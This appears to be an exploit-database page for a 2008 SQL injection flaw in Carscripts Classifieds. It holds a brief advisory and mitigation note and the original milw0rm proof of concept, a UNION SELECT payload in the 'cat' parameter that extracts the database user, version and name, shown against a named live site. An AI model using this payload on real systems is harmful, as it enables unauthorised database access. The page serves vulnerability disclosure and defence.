header-logo
Suggest Exploit
vendor:
Classifieds
by:
Stack
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Classifieds
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Carscripts Classifieds Sql INjection

Carscripts Classifieds is prone to a SQL injection vulnerability. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. The attacker can also execute arbitrary SQL code in the context of the application. This issue affects the 'cat' parameter of the 'index.php' script. This issue is being exploited in the wild.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use stored procedures to access the database.
Source

Exploit-DB raw data:

Carscripts Classifieds Sql INjection

By Stack
Home v4-team.com
###########################################
[+] : you can see the Result in 'Title'
[+] : Open the source page to see the result
###########################################
poc : http://site.co.il/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*

live demo
http://www.carscripts.com/cars/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*

# milw0rm.com [2008-06-18]

Navigation

Suggest Exploit

Services By CQR